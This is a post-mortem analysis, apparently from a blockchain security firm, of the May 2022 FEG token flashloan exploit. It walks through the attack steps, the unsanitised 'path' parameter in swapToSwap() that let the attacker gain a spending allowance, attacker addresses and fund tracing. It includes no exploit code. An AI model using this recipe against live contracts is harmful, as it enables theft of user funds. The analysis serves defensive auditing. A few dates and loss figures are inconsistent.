FEG Token Second Flashloan Exploit Analysis


On May-16–2022 11:31:29 +UTC, the FEG token has experienced flashloan attacks on both BNBChain and Ethereum, leading to approximately $1.9M worth of asset loss in total.

Exploit Transactions

Sample exploit transaction(BNBChain):


Sample exploit transaction(Ethereum):


Related Addresses

Exploiter Address:


R0X(Unverified): https://bscscan.com/address/0xa3d522c151ad654b36bdfe7a69d0c405193a22f9

fBNB(Victim contract): https://bscscan.com/address/0x87b1acce6a1958e522233a737313c086551a5c76

Attack Flow

Note: All the below analysis is based on the transaction level analysis. As the R0X contract is unverified on bscscan, there’s no decisive evidence to show the attack logic.

  1. The attacker borrowed 57,790 WBNB and deposit 30 WBNB to fBNB
  2. The attacker created a new address 0x3985aa71315a7aa4df3cb19602d61465a8850f61
  3. The attacker called the `depositInternal()` function in the unverified R0X contract to deposit 56,705 fBNB to the R0X contract
  4. The attacker created a new address 0x23a5bfa77cccf71f1015fe5f97c8c9c43706fec4
  5. The attacker called 15 times of `BUY()` functions to further deposit the fBNB for R0X contract address
  6. The attacker called the `swapToSwap()` function to approve the `path` (0x23a5bfa77cccf71f1015fe5f97c8c9c43706fec4) to spend 56138 fBNB

7. The attacker called 30 times of `SELL()` functions to withdraw the deposited fBNB (to address 0x3985aa71315a7aa4df3cb19602d61465a8850f61)

8. Additionally, the address 0x23a5bfa77cccf71f1015fe5f97c8c9c43706fec4 called `0xe6916552` method to transfer the approved fBNB to address 0x3985aa71315a7aa4df3cb19602d61465a8850f61.

9. Finally, the attacker withdrew all the fBNB, repaid the flashloan and the rest served as the profit.

Contracts Vulnerability Analysis

This vulnerability is due to a flaw in the “swapToSwap()” function that directly takes user input “path” as a trusted party yet without any sanitations. Furthermore, the function will approve the unprotected “path” parameter to spend the asset in the current address. By calling “depositInternal()” and “swapToSwap()”, the attacker is able to launch an attack that gains a certain allowance and thus drains assets within the contract.

Profit and assets tracing

Attacker fund transfer tracing:


Original Funds were from Tornado cash on BNBChain:




=> 290.97 ETH


=> 4343.15 BNB

As of May-16–2022 11:31:29 +UTC , the funds lies in the attacker wallet(0xf99e5f80486426e7d3e3921269ffee9c2da258e2) on both Ethereum and BSC chain.

Would we spot the issue during the audit?

In an audit, auditors would notice that the untrusted “path” parameter is passed to the protocol and approved for spending assets of the contract. This would is dangerous and would be flagged as “Major’ severity. Furthermore, if the auditors explored deeper they would discover the exploit scenario and highlight it.



  • 0xbbf12714: depositInternal(address,uint256)
  • 0xc172715c: BUY(uint256,address,uint256)
  • 0xb0711483: swapToSwap(address,address,address,uint256)
  • 0xadd975cc: SELL(uint256,address,uint256,uint256)


On May-16–2022 09:24:15 PM +UTC, the FEG token has experienced [flashloan attacks] on BNBChain, leading to approximately $1.3M worth of asset loss.

On May-16–2022 11:31:29 +UTC, the FEG has experienced [flashloan attacks] on Ethereum, leading to approximately $587K ($590) worth of asset loss.



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store